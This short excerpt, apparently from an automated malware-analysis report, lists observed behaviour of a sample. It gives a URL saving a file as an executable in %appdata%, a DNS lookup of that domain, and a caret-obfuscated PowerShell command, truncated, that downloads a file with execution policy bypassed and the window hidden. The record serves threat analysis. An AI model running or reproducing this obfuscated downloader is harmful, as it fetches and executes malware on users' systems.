Technical Information
- http://folueaport.top/read.php?f=0.dat as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Po^W^e^r^SHeL^L^.E^x^e^ -ExecUTIonp^O^Li^CY ^B^Yp^a^Ss -^N^OP^r^o^F^i^l^E -w^in^DowstYlE hi^d^dE^N^ (^n^ew^-^oB^JE^Ct^ S^y^stem.n^eT.WE^bcl^ient)^.d^OwnLOAdFil^e('http://f...
- DNS ASK fo###aport.top
- '<SYSTEM32>\cmd.exe' /c "Po^W^e^r^SHeL^L^.E^x^e^ -ExecUTIonp^O^Li^CY ^B^Yp^a^Ss -^N^OP^r^o^F^i^l^E -w^in^DowstYlE hi^d^dE^N^ (^n^ew^-^oB^JE^Ct^ S^y^stem.n^eT.WE^bcl^ient)^.d^OwnLOAdFil^e('http://f...' (with hidden window)